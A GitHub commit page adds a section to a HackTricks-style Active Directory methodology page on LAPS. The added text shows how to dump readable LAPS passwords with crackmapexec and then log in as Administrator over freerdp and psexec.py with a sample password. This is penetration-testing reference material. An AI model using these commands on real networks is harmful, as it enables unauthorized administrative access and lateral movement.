Skip to content

Commit

Permalink
Merge pull request #906 from NoPurposeInLife/patch-3
Browse files Browse the repository at this point in the history
Update laps.md
  • Loading branch information
carlospolop authored Aug 12, 2024
2 parents 695adbd + d86a065 commit 76b2304
Showing 1 changed file with 9 additions and 0 deletions.
9 changes: 9 additions & 0 deletions windows-hardening/active-directory-methodology/laps.md
Original file line number Diff line number Diff line change
Expand Up @@ -114,6 +114,15 @@ crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
```
This will dump all the passwords that the user can read, allowing you to get a better foothold with a different user.
## ** Using LAPS Password **
```
freerdp /v:192.168.1.1:3389 /u:Administrator
Password: 2Z@Ae)7!{9#Cq
python psexec.py [email protected]
Password: 2Z@Ae)7!{9#Cq
```
## **LAPS Persistence**
### **Expiration Date**
Expand Down

0 comments on commit 76b2304

Please sign in to comment.